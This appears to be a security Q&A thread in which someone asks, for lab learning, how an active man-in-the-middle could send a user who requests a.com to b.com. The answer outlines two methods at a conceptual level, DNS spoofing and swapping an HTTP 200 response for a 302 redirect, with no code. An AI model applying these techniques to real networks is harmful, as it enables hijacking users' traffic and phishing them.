How to implement an active Man-In-The-Middle attack that changes the request URL address

Question

For training purposes, I need some pointers on the tools and tips to implement an active Man-In-The-Middle attack.

The attack scenario that I want to do is a toy example (which has countermeasures by server authentication) is the following:

1) The user request a.com

2) The MITM changes the user request to b.com

3) The user sees b.com in his agent (e.g., browser)

I looked in the web. There is ARPP spoofing, which seems will allow me to sniff on users requests but no manipulate.

What is the easiest way to manipulate the user's requested address through a MITM attacker who does not have access to the user's device, but only the communication channel?

As I said, this question is for learning. It is also worth nothing that this is detectable by modern client agents or browsers, and I do not intend to implement it in any ways other than lab learning environment.

Answer 1

You could MITM the victim’s DNS connection. When the victim requests a name resolution for a.com, you return the address for b.com. The victim’s browser bar will still say a.com, but they will be communicating with b.com.

Or you could MITM the http stream and let the victim connect to a.com, but replace the server’s 200 response with a 302 redirect response to b.com. The victim’s browser will show b.com in the address bar.